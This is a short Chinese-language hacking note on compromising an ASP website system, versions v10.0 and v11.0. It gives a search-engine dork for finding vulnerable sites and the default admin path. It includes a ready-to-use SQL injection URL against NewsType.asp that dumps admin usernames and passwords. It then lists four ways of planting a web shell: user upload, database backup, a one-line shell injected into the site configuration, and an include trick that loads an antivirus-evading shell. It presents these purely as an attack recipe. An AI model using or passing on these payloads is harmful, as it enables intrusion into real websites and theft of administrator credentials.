漏洞影响版本 v10.0 v11.0

关键字：inurl:”HomeMarket.asp”

默认后台：/admin

直接爆用户密码：
http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

拿shell *** 貌似有4种：

1、注册用户上传拿shell，这个比较直接，可以不进后台和在不知道用户名密码的情况下。

2、进后台备份数据库

3、在网站配置的版权信息里插入一句话，一句话地址写入到http://www.xxx.com/inc/config.asp3.1、另外一种插配置：之一步  网站配置添加TXT保存成功后第2步传一个TXT小马小马要免杀的。第3步  网站配置 利用包含得到小马”%><!–#include file=”201331420455473.txt “–><%’填入网站配置。

4、编辑器：/admin/southidceditor/admin_style.asp